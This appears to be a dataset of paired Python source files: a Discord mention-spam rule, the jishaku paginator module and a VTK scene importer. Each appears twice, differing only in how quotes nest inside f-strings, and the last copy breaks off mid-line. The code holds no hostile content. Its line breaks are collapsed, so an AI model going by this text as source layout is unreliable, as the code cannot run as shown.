from typing import Dict, Iterable, List, Optional, Tuple from discord import Member, Message async def apply( last_message: Message, recent_messages: List[Message], config: Dict[str, int] ) -> Optional[Tuple[str, Iterable[Member], Iterable[Message]]]: """Detects total mentions exceeding the limit sent by a single user.""" relevant_messages = tuple( msg for msg in recent_messages if msg.author == last_message.author ) total_recent_mentions = sum(len(msg.mentions) for msg in relevant_messages) if total_recent_mentions > config['max']: return ( f"sent {total_recent_mentions} mentions in {config["interval"]}s", (last_message.author,), relevant_messages ) return None
from typing import Dict, Iterable, List, Optional, Tuple from discord import Member, Message async def apply( last_message: Message, recent_messages: List[Message], config: Dict[str, int] ) -> Optional[Tuple[str, Iterable[Member], Iterable[Message]]]: """Detects total mentions exceeding the limit sent by a single user.""" relevant_messages = tuple( msg for msg in recent_messages if msg.author == last_message.author ) total_recent_mentions = sum(len(msg.mentions) for msg in relevant_messages) if total_recent_mentions > config['max']: return ( f"sent {total_recent_mentions} mentions in {config['interval']}s", (last_message.author,), relevant_messages ) return None
# -*- coding: utf-8 -*- """ jishaku.paginators ~~~~~~~~~~~~~~~~~~ Paginator-related tools and interfaces for Jishaku. :copyright: (c) 2020 Devon (Gorialis) R :license: MIT, see LICENSE for more details. """ import asyncio import collections import re import discord from discord.ext import commands from jishaku.hljs import get_language __all__ = ('EmojiSettings', 'PaginatorInterface', 'PaginatorEmbedInterface', 'WrappedPaginator', 'FilePaginator') # emoji settings, this sets what emoji are used for PaginatorInterface EmojiSettings = collections.namedtuple('EmojiSettings', 'start back forward end close') EMOJI_DEFAULT = EmojiSettings( start="\N{BLACK LEFT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}", back="\N{BLACK LEFT-POINTING TRIANGLE}", forward="\N{BLACK RIGHT-POINTING TRIANGLE}", end="\N{BLACK RIGHT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}", close="\N{BLACK SQUARE FOR STOP}" ) class PaginatorInterface: # pylint: disable=too-many-instance-attributes """ A message and reaction based interface for paginators. """ def __init__(self, bot: commands.Bot, paginator: commands.Paginator, **kwargs): if not isinstance(paginator, commands.Paginator): raise TypeError('paginator must be a commands.Paginator instance') self._display_page = 0 self.bot = bot self.message = None self.paginator = paginator self.owner = kwargs.pop('owner', None) self.emojis = kwargs.pop('emoji', EMOJI_DEFAULT) self.timeout = kwargs.pop('timeout', 7200) self.delete_message = kwargs.pop('delete_message', False) self.sent_page_reactions = False self.task: asyncio.Task = None self.send_lock: asyncio.Event = asyncio.Event() self.update_lock: asyncio.Lock = asyncio.Semaphore(value=kwargs.pop('update_max', 2)) if self.page_size > self.max_page_size: raise ValueError( f'Paginator passed has too large of a page size for this interface. ' f'({self.page_size} > {self.max_page_size})' ) @property def pages(self): """ Returns the paginator's pages without prematurely closing the active page. """ # protected access has to be permitted here to not close the paginator's pages # pylint: disable=protected-access paginator_pages = list(self.paginator._pages) if len(self.paginator._current_page) > 1: paginator_pages.append('\n'.join(self.paginator._current_page) + '\n' + (self.paginator.suffix or '')) # pylint: enable=protected-access return paginator_pages @property def page_count(self): """ Returns the page count of the internal paginator. """ return len(self.pages) @property def display_page(self): """ Returns the current page the paginator interface is on. """ self._display_page = max(0, min(self.page_count - 1, self._display_page)) return self._display_page @display_page.setter def display_page(self, value): """ Sets the current page the paginator is on. Automatically pushes values inbounds. """ self._display_page = max(0, min(self.page_count - 1, value)) max_page_size = 2000 @property def page_size(self) -> int: """ A property that returns how large a page is, calculated from the paginator properties. If this exceeds `max_page_size`, an exception is raised upon instantiation. """ page_count = self.page_count return self.paginator.max_size + len(f'\nPage {page_count}/{page_count}') @property def send_kwargs(self) -> dict: """ A property that returns the kwargs forwarded to send/edit when updating the page. As this must be compatible with both `discord.TextChannel.send` and `discord.Message.edit`, it should be a dict containing 'content', 'embed' or both. """ display_page = self.display_page page_num = f'\nPage {display_page + 1}/{self.page_count}' content = self.pages[display_page] + page_num return {'content': content} async def add_line(self, *args, **kwargs): """ A proxy function that allows this PaginatorInterface to remain locked to the last page if it is already on it. """ display_page = self.display_page page_count = self.page_count self.paginator.add_line(*args, **kwargs) new_page_count = self.page_count if display_page + 1 == page_count: # To keep position fixed on the end, update position to new last page and update message. self._display_page = new_page_count self.bot.loop.create_task(self.update()) async def send_to(self, destination: discord.abc.Messageable): """ Sends a message to the given destination with this interface. This automatically creates the response task for you. """ self.message = await destination.send(**self.send_kwargs) # add the close reaction await self.message.add_reaction(self.emojis.close) self.send_lock.set() if self.task: self.task.cancel() self.task = self.bot.loop.create_task(self.wait_loop()) # if there is more than one page, and the reactions haven't been sent yet, send navigation emotes if not self.sent_page_reactions and self.page_count > 1: await self.send_all_reactions() return self async def send_all_reactions(self): """ Sends all reactions for this paginator, if any are missing. This method is generally for internal use only. """ for emoji in filter(None, self.emojis): try: await self.message.add_reaction(emoji) except discord.NotFound: # the paginator has probably already been closed break self.sent_page_reactions = True @property def closed(self): """ Is this interface closed? """ if not self.task: return False return self.task.done() async def wait_loop(self): """ Waits on a loop for reactions to the message. This should not be called manually - it is handled by `send_to`. """ start, back, forward, end, close = self.emojis def check(payload: discord.RawReactionActionEvent): """ Checks if this reaction is related to the paginator interface. """ owner_check = not self.owner or payload.user_id == self.owner.id emoji = payload.emoji if isinstance(emoji, discord.PartialEmoji) and emoji.is_unicode_emoji(): emoji = emoji.name tests = ( owner_check, payload.message_id == self.message.id, emoji, emoji in self.emojis, payload.user_id != self.bot.user.id ) return all(tests) try: while not self.bot.is_closed(): payload = await self.bot.wait_for('raw_reaction_add', check=check, timeout=self.timeout) emoji = payload.emoji if isinstance(emoji, discord.PartialEmoji) and emoji.is_unicode_emoji(): emoji = emoji.name if emoji == close: await self.message.delete() return if emoji == start: self._display_page = 0 elif emoji == end: self._display_page = self.page_count - 1 elif emoji == back: self._display_page -= 1 elif emoji == forward: self._display_page += 1 self.bot.loop.create_task(self.update()) try: await self.message.remove_reaction(payload.emoji, discord.Object(id=payload.user_id)) except discord.Forbidden: pass except (asyncio.CancelledError, asyncio.TimeoutError): if self.delete_message: return await self.message.delete() for emoji in filter(None, self.emojis): try: await self.message.remove_reaction(emoji, self.bot.user) except (discord.Forbidden, discord.NotFound): pass async def update(self): """ Updates this interface's messages with the latest data. """ if self.update_lock.locked(): return await self.send_lock.wait() async with self.update_lock: if self.update_lock.locked(): # if this engagement has caused the semaphore to exhaust, # we are overloaded and need to calm down. await asyncio.sleep(1) if not self.message: # too fast, stagger so this update gets through await asyncio.sleep(0.5) if not self.sent_page_reactions and self.page_count > 1: self.bot.loop.create_task(self.send_all_reactions()) self.sent_page_reactions = True # don't spawn any more tasks try: await self.message.edit(**self.send_kwargs) except discord.NotFound: # something terrible has happened if self.task: self.task.cancel() class PaginatorEmbedInterface(PaginatorInterface): """ A subclass of :class:`PaginatorInterface` that encloses content in an Embed. """ def __init__(self, *args, **kwargs): self._embed = kwargs.pop('embed', None) or discord.Embed() self._footer = kwargs.pop('footer', None) or {"text": "", "icon_url": None} super().__init__(*args, **kwargs) @property def send_kwargs(self) -> dict: display_page = self.display_page self._embed.description = self.pages[display_page] footer_text = f'Page {display_page + 1}/{self.page_count}' if self._footer["text"] != "": footer_text = f'{self._footer['text']} | Page {display_page + 1}/{self.page_count}' if self._footer["icon_url"]: self._embed.set_footer(text=footer_text, icon_url=self._footer["icon_url"]) else: self._embed.set_footer(text=footer_text) return {'embed': self._embed} max_page_size = 2048 @property def page_size(self) -> int: return self.paginator.max_size class WrappedPaginator(commands.Paginator): """ A paginator that allows automatic wrapping of lines should they not fit. This is useful when paginating unpredictable output, as it allows for line splitting on big chunks of data. Delimiters are prioritized in the order of their tuple. Parameters ----------- wrap_on: tuple A tuple of wrapping delimiters. include_wrapped: bool Whether to include the delimiter at the start of the new wrapped line. force_wrap: bool If this is True, lines will be split at their maximum points should trimming not be possible with any provided delimiter. """ def __init__(self, *args, wrap_on=('\n', ' '), include_wrapped=True, force_wrap=False, **kwargs): super().__init__(*args, **kwargs) self.wrap_on = wrap_on self.include_wrapped = include_wrapped self.force_wrap = force_wrap def add_line(self, line='', *, empty=False): true_max_size = self.max_size - self._prefix_len - self._suffix_len - 2 original_length = len(line) while len(line) > true_max_size: search_string = line[0:true_max_size - 1] wrapped = False for delimiter in self.wrap_on: position = search_string.rfind(delimiter) if position > 0: super().add_line(line[0:position], empty=empty) wrapped = True if self.include_wrapped: line = line[position:] else: line = line[position + len(delimiter):] break if not wrapped: if self.force_wrap: super().add_line(line[0:true_max_size - 1]) line = line[true_max_size - 1:] else: raise ValueError( f"Line of length {original_length} had sequence of {len(line)} characters" f" (max is {true_max_size}) that WrappedPaginator could not wrap with" f" delimiters: {self.wrap_on}" ) super().add_line(line, empty=empty) class FilePaginator(commands.Paginator): """ A paginator of syntax-highlighted codeblocks, read from a file-like. Parameters ----------- fp A file-like (implements ``fp.read``) to read the data for this paginator from. line_span: Optional[Tuple[int, int]] A linespan to read from the file. If None, reads the whole file. language_hints: Tuple[str] A tuple of strings that may hint to the language of this file. This could include filenames, MIME types, or shebangs. A shebang present in the actual file will always be prioritized over this. """ __encoding_regex = re.compile(br'coding[=:]\s*([-\w.]+)') def __init__(self, fp, line_span=None, language_hints=(), **kwargs): language = '' for hint in language_hints: language = get_language(hint) if language: break if not language: try: language = get_language(fp.name) except AttributeError: pass raw_content = fp.read() try: lines = raw_content.decode('utf-8').split('\n') except UnicodeDecodeError as exc: # This file isn't UTF-8. # By Python and text-editor convention, # there may be a hint as to what the actual encoding is # near the start of the file. encoding_match = self.__encoding_regex.search(raw_content[:128]) if encoding_match: encoding = encoding_match.group(1) else: raise exc try: lines = raw_content.decode(encoding.decode('utf-8')).split('\n') except UnicodeDecodeError as exc2: raise exc2 from exc del raw_content # If the first line is a shebang, if lines[0].startswith('#!'): # prioritize its declaration over the extension. language = get_language(lines[0]) or language super().__init__(prefix=f'```{language}', suffix='```', **kwargs) if line_span: line_span = sorted(line_span) if min(line_span) < 1 or max(line_span) > len(lines): raise ValueError("Linespan goes out of bounds.") lines = lines[line_span[0] - 1:line_span[1]] for line in lines: self.add_line(line) class WrappedFilePaginator(FilePaginator, WrappedPaginator): """ Combination of FilePaginator and WrappedPaginator. In other words, a FilePaginator that supports line wrapping. """
# -*- coding: utf-8 -*- """ jishaku.paginators ~~~~~~~~~~~~~~~~~~ Paginator-related tools and interfaces for Jishaku. :copyright: (c) 2020 Devon (Gorialis) R :license: MIT, see LICENSE for more details. """ import asyncio import collections import re import discord from discord.ext import commands from jishaku.hljs import get_language __all__ = ('EmojiSettings', 'PaginatorInterface', 'PaginatorEmbedInterface', 'WrappedPaginator', 'FilePaginator') # emoji settings, this sets what emoji are used for PaginatorInterface EmojiSettings = collections.namedtuple('EmojiSettings', 'start back forward end close') EMOJI_DEFAULT = EmojiSettings( start="\N{BLACK LEFT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}", back="\N{BLACK LEFT-POINTING TRIANGLE}", forward="\N{BLACK RIGHT-POINTING TRIANGLE}", end="\N{BLACK RIGHT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}", close="\N{BLACK SQUARE FOR STOP}" ) class PaginatorInterface: # pylint: disable=too-many-instance-attributes """ A message and reaction based interface for paginators. """ def __init__(self, bot: commands.Bot, paginator: commands.Paginator, **kwargs): if not isinstance(paginator, commands.Paginator): raise TypeError('paginator must be a commands.Paginator instance') self._display_page = 0 self.bot = bot self.message = None self.paginator = paginator self.owner = kwargs.pop('owner', None) self.emojis = kwargs.pop('emoji', EMOJI_DEFAULT) self.timeout = kwargs.pop('timeout', 7200) self.delete_message = kwargs.pop('delete_message', False) self.sent_page_reactions = False self.task: asyncio.Task = None self.send_lock: asyncio.Event = asyncio.Event() self.update_lock: asyncio.Lock = asyncio.Semaphore(value=kwargs.pop('update_max', 2)) if self.page_size > self.max_page_size: raise ValueError( f'Paginator passed has too large of a page size for this interface. ' f'({self.page_size} > {self.max_page_size})' ) @property def pages(self): """ Returns the paginator's pages without prematurely closing the active page. """ # protected access has to be permitted here to not close the paginator's pages # pylint: disable=protected-access paginator_pages = list(self.paginator._pages) if len(self.paginator._current_page) > 1: paginator_pages.append('\n'.join(self.paginator._current_page) + '\n' + (self.paginator.suffix or '')) # pylint: enable=protected-access return paginator_pages @property def page_count(self): """ Returns the page count of the internal paginator. """ return len(self.pages) @property def display_page(self): """ Returns the current page the paginator interface is on. """ self._display_page = max(0, min(self.page_count - 1, self._display_page)) return self._display_page @display_page.setter def display_page(self, value): """ Sets the current page the paginator is on. Automatically pushes values inbounds. """ self._display_page = max(0, min(self.page_count - 1, value)) max_page_size = 2000 @property def page_size(self) -> int: """ A property that returns how large a page is, calculated from the paginator properties. If this exceeds `max_page_size`, an exception is raised upon instantiation. """ page_count = self.page_count return self.paginator.max_size + len(f'\nPage {page_count}/{page_count}') @property def send_kwargs(self) -> dict: """ A property that returns the kwargs forwarded to send/edit when updating the page. As this must be compatible with both `discord.TextChannel.send` and `discord.Message.edit`, it should be a dict containing 'content', 'embed' or both. """ display_page = self.display_page page_num = f'\nPage {display_page + 1}/{self.page_count}' content = self.pages[display_page] + page_num return {'content': content} async def add_line(self, *args, **kwargs): """ A proxy function that allows this PaginatorInterface to remain locked to the last page if it is already on it. """ display_page = self.display_page page_count = self.page_count self.paginator.add_line(*args, **kwargs) new_page_count = self.page_count if display_page + 1 == page_count: # To keep position fixed on the end, update position to new last page and update message. self._display_page = new_page_count self.bot.loop.create_task(self.update()) async def send_to(self, destination: discord.abc.Messageable): """ Sends a message to the given destination with this interface. This automatically creates the response task for you. """ self.message = await destination.send(**self.send_kwargs) # add the close reaction await self.message.add_reaction(self.emojis.close) self.send_lock.set() if self.task: self.task.cancel() self.task = self.bot.loop.create_task(self.wait_loop()) # if there is more than one page, and the reactions haven't been sent yet, send navigation emotes if not self.sent_page_reactions and self.page_count > 1: await self.send_all_reactions() return self async def send_all_reactions(self): """ Sends all reactions for this paginator, if any are missing. This method is generally for internal use only. """ for emoji in filter(None, self.emojis): try: await self.message.add_reaction(emoji) except discord.NotFound: # the paginator has probably already been closed break self.sent_page_reactions = True @property def closed(self): """ Is this interface closed? """ if not self.task: return False return self.task.done() async def wait_loop(self): """ Waits on a loop for reactions to the message. This should not be called manually - it is handled by `send_to`. """ start, back, forward, end, close = self.emojis def check(payload: discord.RawReactionActionEvent): """ Checks if this reaction is related to the paginator interface. """ owner_check = not self.owner or payload.user_id == self.owner.id emoji = payload.emoji if isinstance(emoji, discord.PartialEmoji) and emoji.is_unicode_emoji(): emoji = emoji.name tests = ( owner_check, payload.message_id == self.message.id, emoji, emoji in self.emojis, payload.user_id != self.bot.user.id ) return all(tests) try: while not self.bot.is_closed(): payload = await self.bot.wait_for('raw_reaction_add', check=check, timeout=self.timeout) emoji = payload.emoji if isinstance(emoji, discord.PartialEmoji) and emoji.is_unicode_emoji(): emoji = emoji.name if emoji == close: await self.message.delete() return if emoji == start: self._display_page = 0 elif emoji == end: self._display_page = self.page_count - 1 elif emoji == back: self._display_page -= 1 elif emoji == forward: self._display_page += 1 self.bot.loop.create_task(self.update()) try: await self.message.remove_reaction(payload.emoji, discord.Object(id=payload.user_id)) except discord.Forbidden: pass except (asyncio.CancelledError, asyncio.TimeoutError): if self.delete_message: return await self.message.delete() for emoji in filter(None, self.emojis): try: await self.message.remove_reaction(emoji, self.bot.user) except (discord.Forbidden, discord.NotFound): pass async def update(self): """ Updates this interface's messages with the latest data. """ if self.update_lock.locked(): return await self.send_lock.wait() async with self.update_lock: if self.update_lock.locked(): # if this engagement has caused the semaphore to exhaust, # we are overloaded and need to calm down. await asyncio.sleep(1) if not self.message: # too fast, stagger so this update gets through await asyncio.sleep(0.5) if not self.sent_page_reactions and self.page_count > 1: self.bot.loop.create_task(self.send_all_reactions()) self.sent_page_reactions = True # don't spawn any more tasks try: await self.message.edit(**self.send_kwargs) except discord.NotFound: # something terrible has happened if self.task: self.task.cancel() class PaginatorEmbedInterface(PaginatorInterface): """ A subclass of :class:`PaginatorInterface` that encloses content in an Embed. """ def __init__(self, *args, **kwargs): self._embed = kwargs.pop('embed', None) or discord.Embed() self._footer = kwargs.pop('footer', None) or {"text": "", "icon_url": None} super().__init__(*args, **kwargs) @property def send_kwargs(self) -> dict: display_page = self.display_page self._embed.description = self.pages[display_page] footer_text = f'Page {display_page + 1}/{self.page_count}' if self._footer["text"] != "": footer_text = f'{self._footer["text"]} | Page {display_page + 1}/{self.page_count}' if self._footer["icon_url"]: self._embed.set_footer(text=footer_text, icon_url=self._footer["icon_url"]) else: self._embed.set_footer(text=footer_text) return {'embed': self._embed} max_page_size = 2048 @property def page_size(self) -> int: return self.paginator.max_size class WrappedPaginator(commands.Paginator): """ A paginator that allows automatic wrapping of lines should they not fit. This is useful when paginating unpredictable output, as it allows for line splitting on big chunks of data. Delimiters are prioritized in the order of their tuple. Parameters ----------- wrap_on: tuple A tuple of wrapping delimiters. include_wrapped: bool Whether to include the delimiter at the start of the new wrapped line. force_wrap: bool If this is True, lines will be split at their maximum points should trimming not be possible with any provided delimiter. """ def __init__(self, *args, wrap_on=('\n', ' '), include_wrapped=True, force_wrap=False, **kwargs): super().__init__(*args, **kwargs) self.wrap_on = wrap_on self.include_wrapped = include_wrapped self.force_wrap = force_wrap def add_line(self, line='', *, empty=False): true_max_size = self.max_size - self._prefix_len - self._suffix_len - 2 original_length = len(line) while len(line) > true_max_size: search_string = line[0:true_max_size - 1] wrapped = False for delimiter in self.wrap_on: position = search_string.rfind(delimiter) if position > 0: super().add_line(line[0:position], empty=empty) wrapped = True if self.include_wrapped: line = line[position:] else: line = line[position + len(delimiter):] break if not wrapped: if self.force_wrap: super().add_line(line[0:true_max_size - 1]) line = line[true_max_size - 1:] else: raise ValueError( f"Line of length {original_length} had sequence of {len(line)} characters" f" (max is {true_max_size}) that WrappedPaginator could not wrap with" f" delimiters: {self.wrap_on}" ) super().add_line(line, empty=empty) class FilePaginator(commands.Paginator): """ A paginator of syntax-highlighted codeblocks, read from a file-like. Parameters ----------- fp A file-like (implements ``fp.read``) to read the data for this paginator from. line_span: Optional[Tuple[int, int]] A linespan to read from the file. If None, reads the whole file. language_hints: Tuple[str] A tuple of strings that may hint to the language of this file. This could include filenames, MIME types, or shebangs. A shebang present in the actual file will always be prioritized over this. """ __encoding_regex = re.compile(br'coding[=:]\s*([-\w.]+)') def __init__(self, fp, line_span=None, language_hints=(), **kwargs): language = '' for hint in language_hints: language = get_language(hint) if language: break if not language: try: language = get_language(fp.name) except AttributeError: pass raw_content = fp.read() try: lines = raw_content.decode('utf-8').split('\n') except UnicodeDecodeError as exc: # This file isn't UTF-8. # By Python and text-editor convention, # there may be a hint as to what the actual encoding is # near the start of the file. encoding_match = self.__encoding_regex.search(raw_content[:128]) if encoding_match: encoding = encoding_match.group(1) else: raise exc try: lines = raw_content.decode(encoding.decode('utf-8')).split('\n') except UnicodeDecodeError as exc2: raise exc2 from exc del raw_content # If the first line is a shebang, if lines[0].startswith('#!'): # prioritize its declaration over the extension. language = get_language(lines[0]) or language super().__init__(prefix=f'```{language}', suffix='```', **kwargs) if line_span: line_span = sorted(line_span) if min(line_span) < 1 or max(line_span) > len(lines): raise ValueError("Linespan goes out of bounds.") lines = lines[line_span[0] - 1:line_span[1]] for line in lines: self.add_line(line) class WrappedFilePaginator(FilePaginator, WrappedPaginator): """ Combination of FilePaginator and WrappedPaginator. In other words, a FilePaginator that supports line wrapping. """
import json import zipfile import vtk import re import struct from .synchronizable_serializer import arrayTypesMapping METHODS_RENAME = { "AddTexture": "SetTexture", "SetUseGradientOpacity": None, "SetRGBTransferFunction": "SetColor", } WRAP_ID_RE = re.compile(r"instance:\${([^}]+)}") ARRAY_TYPES = { 'Int8Array': vtk.vtkCharArray, 'Uint8Array': vtk.vtkUnsignedCharArray, 'Int16Array': vtk.vtkShortArray, 'UInt16Array': vtk.vtkUnsignedShortArray, 'Int32Array': vtk.vtkIntArray, 'Uint32Array': vtk.vtkUnsignedIntArray, 'Float32Array': vtk.vtkFloatArray, 'Float64Array': vtk.vtkDoubleArray, } def capitalize(name): "Upper the first letter letting the rest unchange" return name[0].upper() + name[1:] def fill_array(vtk_arr, state, zf): vtk_arr.SetNumberOfComponents(state['numberOfComponents']) vtk_arr.SetNumberOfTuples(state['size']//state['numberOfComponents']) data = zf.read('data/%s' % state['hash']) dataType = arrayTypesMapping[vtk_arr.GetDataType()] elementSize = struct.calcsize(dataType) if vtk_arr.GetDataType() == 12: # we need to cast the data to Uint64 import numpy as np data = np.frombuffer(data, dtype=np.uint32).astype(np.uint64).tobytes() elementSize = 8 vtk_arr.SetVoidArray(data, len(data)//elementSize, 1) vtk_arr._reference = data def color_fun_builder(state, zf, register): instance = getattr(vtk, state['type'])() register.update({state['id']: instance}) nodes = state['properties'].pop('nodes') set_properties(instance, state['properties']) for node in nodes: instance.AddRGBPoint(*node) def piecewise_fun_builder(state, zf, register): instance = getattr(vtk, state['type'])() register.update({state['id']: instance}) nodes = state['properties'].pop('nodes') set_properties(instance, state['properties']) for node in nodes: instance.AddPoint(*node) def poly_data_builder(state, zf, register): instance = vtk.vtkPolyData() register.update({state['id']: instance}) # geometry if 'points' in state['properties']: points = state['properties']['points'] vtkpoints = vtk.vtkPoints() data_arr = ARRAY_TYPES[points['dataType']]() fill_array(data_arr, points, zf) vtkpoints.SetData(data_arr) instance.SetPoints(vtkpoints) for cell_type in ['verts', 'lines', 'polys', 'strips']: if cell_type in state['properties']: cell_arr = vtk.vtkCellArray() fill_array(cell_arr.GetData(), state['properties'][cell_type], zf) getattr(instance, 'Set' + capitalize(cell_type))(cell_arr) # datasets fields = state['properties']['fields'] for dataset in fields: data_arr = ARRAY_TYPES[dataset['dataType']]() fill_array(data_arr, dataset, zf) location = getattr(instance, 'Get' + capitalize(dataset['location']))() getattr(location, capitalize(dataset['registration']))(data_arr) def volume_mapper_builder(state, zf, register): instance = generic_builder(state, zf, register) instance.SetScalarMode(1) #need to force the scalar mode to be on points def generic_builder(state, zf, register=None): if register is None: register = {} instance = getattr(vtk, state['type'])() register.update({state['id']: instance}) set_properties(instance, state['properties']) dependencies = state.get('dependencies', None) if dependencies: for dep in dependencies: builder = TYPE_HANDLERS[dep['type']] if builder: builder(dep, zf, register) else: print(f'No builder for {dep['type']}') calls = state.get('calls', None) if calls: for call in calls: args=[] skip=False for arg in call[1]: try: extract_instance = WRAP_ID_RE.findall(arg)[0] args.append(register[extract_instance]) except (IndexError, TypeError): args.append(arg) except KeyError: skip = True if skip: continue if capitalize(call[0]) not in METHODS_RENAME: method = capitalize(call[0]) else: method = METHODS_RENAME[capitalize(call[0])] if method is None: continue getattr(instance, method)(*args) arrays = state.get('arrays', None) if arrays: for array_meta in arrays: vtk_array = ARRAY_TYPES[array_meta['dataType']]() fill_array(vtk_array, array_meta, zf) location = (instance if 'location' not in array_meta else getattr(instance, 'Get'+capitalize(array_meta['location']))()) getattr(location, capitalize(array_meta['registration']))(vtk_array) return instance def set_properties(instance, properties): for k, v in properties.items(): fn = getattr(instance, 'Set'+capitalize(k), None) if fn: fn(v) def import_synch_file(filename): with zipfile.ZipFile(filename, 'r') as zf: scene = json.loads(zf.read('index.json').decode()) scene['properties']['numberOfLayers'] = 1 renwin = generic_builder(scene, zf) return renwin def make_type_handlers(): aliases = { 'vtkMapper': ['vtkOpenGLPolyDataMapper', 'vtkCompositePolyDataMapper2', 'vtkDataSetMapper'], 'vtkProperty': ['vtkOpenGLProperty'], 'vtkRenderer': ['vtkOpenGLRenderer'], 'vtkCamera': ['vtkOpenGLCamera'], 'vtkColorTransferFunction': ['vtkPVDiscretizableColorTransferFunction'], 'vtkActor': ['vtkOpenGLActor', 'vtkPVLODActor'], 'vtkLight': ['vtkOpenGLLight', 'vtkPVLight'], 'vtkTexture': ['vtkOpenGLTexture'], 'vtkVolumeMapper': ['vtkFixedPointVolumeRayCastMapper', 'vtkSmartVolumeMapper'] } type_handlers = { 'vtkRenderer': generic_builder, 'vtkLookupTable': generic_builder, 'vtkLight': None, 'vtkCamera': generic_builder, 'vtkPolyData': poly_data_builder, 'vtkImageData': generic_builder, 'vtkMapper': generic_builder, 'vtkGlyph3DMapper': generic_builder, 'vtkProperty': generic_builder, 'vtkActor': generic_builder, 'vtkFollower': generic_builder, 'vtkColorTransferFunction': color_fun_builder, 'vtkPiecewiseFunction': piecewise_fun_builder, 'vtkTexture': generic_builder, 'vtkVolumeMapper': volume_mapper_builder, 'vtkVolume': generic_builder, 'vtkVolumeProperty': generic_builder } for k, alias_list in aliases.items(): for alias in alias_list: type_handlers.update({ alias: type_handlers[k] }) return type_handlers TYPE_HANDLERS = make_type_handlers()
import json import zipfile import vtk import re import struct from .synchronizable_serializer import arrayTypesMapping METHODS_RENAME = { "AddTexture": "SetTexture", "SetUseGradientOpacity": None, "SetRGBTransferFunction": "SetColor", } WRAP_ID_RE = re.compile(r"instance:\${([^}]+)}") ARRAY_TYPES = { 'Int8Array': vtk.vtkCharArray, 'Uint8Array': vtk.vtkUnsignedCharArray, 'Int16Array': vtk.vtkShortArray, 'UInt16Array': vtk.vtkUnsignedShortArray, 'Int32Array': vtk.vtkIntArray, 'Uint32Array': vtk.vtkUnsignedIntArray, 'Float32Array': vtk.vtkFloatArray, 'Float64Array': vtk.vtkDoubleArray, } def capitalize(name): "Upper the first letter letting the rest unchange" return name[0].upper() + name[1:] def fill_array(vtk_arr, state, zf): vtk_arr.SetNumberOfComponents(state['numberOfComponents']) vtk_arr.SetNumberOfTuples(state['size']//state['numberOfComponents']) data = zf.read('data/%s' % state['hash']) dataType = arrayTypesMapping[vtk_arr.GetDataType()] elementSize = struct.calcsize(dataType) if vtk_arr.GetDataType() == 12: # we need to cast the data to Uint64 import numpy as np data = np.frombuffer(data, dtype=np.uint32).astype(np.uint64).tobytes() elementSize = 8 vtk_arr.SetVoidArray(data, len(data)//elementSize, 1) vtk_arr._reference = data def color_fun_builder(state, zf, register): instance = getattr(vtk, state['type'])() register.update({state['id']: instance}) nodes = state['properties'].pop('nodes') set_properties(instance, state['properties']) for node in nodes: instance.AddRGBPoint(*node) def piecewise_fun_builder(state, zf, register): instance = getattr(vtk, state['type'])() register.update({state['id']: instance}) nodes = state['properties'].pop('nodes') set_properties(instance, state['properties']) for node in nodes: instance.AddPoint(*node) def poly_data_builder(state, zf, register): instance = vtk.vtkPolyData() register.update({state['id']: instance}) # geometry if 'points' in state['properties']: points = state['properties']['points'] vtkpoints = vtk.vtkPoints() data_arr = ARRAY_TYPES[points['dataType']]() fill_array(data_arr, points, zf) vtkpoints.SetData(data_arr) instance.SetPoints(vtkpoints) for cell_type in ['verts', 'lines', 'polys', 'strips']: if cell_type in state['properties']: cell_arr = vtk.vtkCellArray() fill_array(cell_arr.GetData(), state['properties'][cell_type], zf) getattr(instance, 'Set' + capitalize(cell_type))(cell_arr) # datasets fields = state['properties']['fields'] for dataset in fields: data_arr = ARRAY_TYPES[dataset['dataType']]() fill_array(data_arr, dataset, zf) location = getattr(instance, 'Get' + capitalize(dataset['location']))() getattr(location, capitalize(dataset['registration']))(data_arr) def volume_mapper_builder(state, zf, register): instance = generic_builder(state, zf, register) instance.SetScalarMode(1) #need to force the scalar mode to be on points def generic_builder(state, zf, register=None): if register is None: register = {} instance = getattr(vtk, state['type'])() register.update({state['id']: instance}) set_properties(instance, state['properties']) dependencies = state.get('dependencies', None) if dependencies: for dep in dependencies: builder = TYPE_HANDLERS[dep['type']] if builder: builder(dep, zf, register) else: print(f'No builder for {dep["type"]}') calls = state.get('calls', None) if calls: for call in calls: args=[] skip=False for arg in call[1]: try: extract_instance = WRAP_ID_RE.findall(arg)[0] args.append(register[extract_instance]) except (IndexError, TypeError): args.append(arg) except KeyError: skip = True if skip: continue if capitalize(call[0]) not in METHODS_RENAME: method = capitalize(call[0]) else: method = METHODS_RENAME[capitalize(call[0])] if method is None: continue getattr(instance, method)(*args) arrays = state.get('arrays', None) if arrays: for array_meta in arrays: vtk_array = ARRAY_TYPES[array_meta['dataType']]() fill_array(vtk_array, array_meta, zf) location = (instance if 'location' not in array_meta else getattr(instance, 'Get'+capitalize(array_meta['location']))()) getattr(location, capitalize(array_meta['registration']))(vtk_array) return instance def set_properties(instance, properties): for k, v in properties.items(): fn = getattr(instance, 'Set'+capitalize(k), None) if fn: fn(v) def import_synch_file(filename): with zipfile.ZipFile(filename, 'r') as zf: scene = json.loads(zf.read('index.json').decode()) scene['properties']['numberOfLayers'] = 1 renwin = generic_builder(scene, zf) return renwin def make_type_handlers(): aliases = { 'vtkMapper': ['vtkOpenGLPolyDataMapper', 'vtkCompositePolyDataMapper2', 'vtkDataSetMapper'], 'vtkProperty': ['vtkOpenGLProperty'], 'vtkRenderer': ['vtkOpenGLRenderer'], 'vtkCamera': ['vtkOpenGLCamera'], 'vtkColorTransferFunction': ['vtkPVDiscretizableColorTransferFunction'], 'vtkActor': ['vtkOpenGLActor', 'vtkPVLODActor'], 'vtkLight': ['vtkOpenGLLight', 'vtkPVLight'], 'vtkTexture': ['vtkOpenGLTexture'], 'vtkVolumeMapper': ['vtkFixedPointVolumeRayCastMapper', 'vtkSmartVolumeMapper'] } type_handlers = { 'vtkRenderer': generic_builder, 'vtkLookupTable': generic_builder, 'vtkLight': None, 'vtkCamera': generic_builder, 'vtkPolyData': poly_data_builder, 'vtkImageData': generic_builder, 'vtkMapper': generic_builder, 'vtkGlyph3DMapper': generic_builder, 'vtkProperty': generic_builder, 'vtkActor': generic_builder, 'vtkFollower': generic_builder, 'vtkColorTransferFunction': color_fun_builder, 'vtkPiecewiseFunction': piecewise_fun_builder, 'vtkTexture': generic_builder, 'vtkVolumeMapper': volume_mapper_builder, 'vtkVolume': generic_builder, 'vtkVolumeProperty': generic_builder } for k, 